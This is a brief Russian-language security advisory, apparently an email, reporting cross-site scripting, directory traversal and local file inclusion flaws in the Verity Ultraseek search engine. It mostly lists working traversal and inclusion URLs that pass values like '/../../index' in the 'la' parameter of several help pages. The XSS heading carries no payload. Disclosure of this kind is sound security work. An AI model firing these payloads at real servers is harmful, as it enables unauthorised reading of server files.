Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting, Directory Traversal и Local File Inclusion уязвимостях в Verity Ultraseek. Уязвима последняя версия движка (уязвимости проверены на официальном сайте разработчика данного поискового движка).
XSS: Remote HTML Include / Remote XSS Include:
Directory Traversal:
http://site/help/syntax.html?la=/../../index
http://site/help/searchtips.html?la=/../../index
http://site/help/refine.html?la=/../../index
http://site/help/special.html?la=/../../index
http://site/help/boolean.html?la=/../../index
http://site/help/meta.html?la=/../../index
Local File Inclusion:
http://site/help/syntax.html?la=/../query
http://site/help/searchtips.html?la=/../query
http://site/help/refine.html?la=/../query
http://site/help/special.html?la=/../query
http://site/help/boolean.html?la=/../query
http://site/help/meta.html?la=/../query
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1831/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua